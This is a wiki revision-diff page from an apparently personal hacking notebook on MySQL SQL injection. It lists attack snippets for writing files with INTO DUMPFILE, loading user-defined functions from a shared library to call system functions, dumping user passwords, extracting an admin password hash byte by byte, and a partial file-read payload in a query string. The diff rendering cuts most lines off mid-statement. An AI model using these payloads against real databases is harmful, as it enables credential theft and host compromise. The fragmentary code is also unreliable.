hacking:sql_injection:mysql:users
Differences
This shows you the differences between two versions of the page.
Next revision | Previous revision | ||
hacking:sql_injection:mysql:users [2020/04/16 23:03] – created peter | hacking:sql_injection:mysql:users [2020/07/15 09:30] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 1: | Line 1: | ||
====== Hacking - SQL Injection - MySQL - Users ====== | ====== Hacking - SQL Injection - MySQL - Users ====== | ||
+ | |||
+ | ===== Users ===== | ||
<code sql> | <code sql> | ||
Line 12: | Line 14: | ||
SELECT ... INTO DUMPFILE | SELECT ... INTO DUMPFILE | ||
</ | </ | ||
+ | |||
+ | ---- | ||
+ | |||
+ | ===== UDF (User-Defined Functions) ===== | ||
+ | |||
+ | <code sql> | ||
+ | create function LockWorkStation returns integer soname ' | ||
+ | select LockWorkStation(); | ||
+ | create function ExitProcess returns integer soname ' | ||
+ | select exitprocess(); | ||
+ | |||
+ | SELECT USER(); | ||
+ | SELECT password, | ||
+ | </ | ||
+ | |||
+ | ---- | ||
+ | |||
+ | ===== First byte of admin hash ===== | ||
+ | |||
+ | <code sql> | ||
+ | SELECT SUBSTRING(user_password, | ||
+ | </ | ||
+ | |||
+ | ---- | ||
+ | |||
+ | ===== Read File ===== | ||
+ | |||
+ | <code sql> | ||
+ | query.php? | ||
+ | </ | ||
+ | |||
+ |
hacking/sql_injection/mysql/users.1587078211.txt.gz · Last modified: 2020/07/15 09:30 (external edit)